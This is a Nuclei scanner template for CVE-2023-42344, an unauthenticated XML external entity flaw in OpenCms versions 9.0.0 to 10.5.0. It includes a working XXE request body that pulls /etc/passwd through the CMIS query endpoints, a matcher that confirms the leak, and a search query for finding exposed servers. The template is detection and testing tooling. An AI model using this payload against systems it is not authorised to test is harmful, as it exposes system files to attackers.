45 lines
2.1 KiB
YAML
45 lines
2.1 KiB
YAML
id: CVE-2023-42344
|
|
|
|
info:
|
|
name: OpenCMS - XML external entity (XXE)
|
|
author: 0xr2r
|
|
severity: high
|
|
description: |
|
|
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
|
|
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
|
|
reference:
|
|
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
|
|
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
|
|
classification:
|
|
cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: alkacon
|
|
product: opencms
|
|
fofa-query: "OpenCms-9.5.3"
|
|
tags: cve,cve2023,xxe,opencms
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
|
|
- "{{BaseURL}}/cmisatom/cmis-online/query"
|
|
|
|
headers:
|
|
Content-Type: "application/xml;charset=UTF-8"
|
|
Referer: "{{RootURL}}"
|
|
|
|
body: |
|
|
<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- "invalidArgument"
|
|
condition: and
|
|
# digest: 4b0a00483046022100cd9297a69206851b5a270935eba6b12279fab44f2cd9e9f9727a44a29a1a3719022100c26954d267055f5a683fa9174f4524b95cef451fd0a5a741e7f039e72cb72f15:922c64590222798bb761d5b6d8e72950 |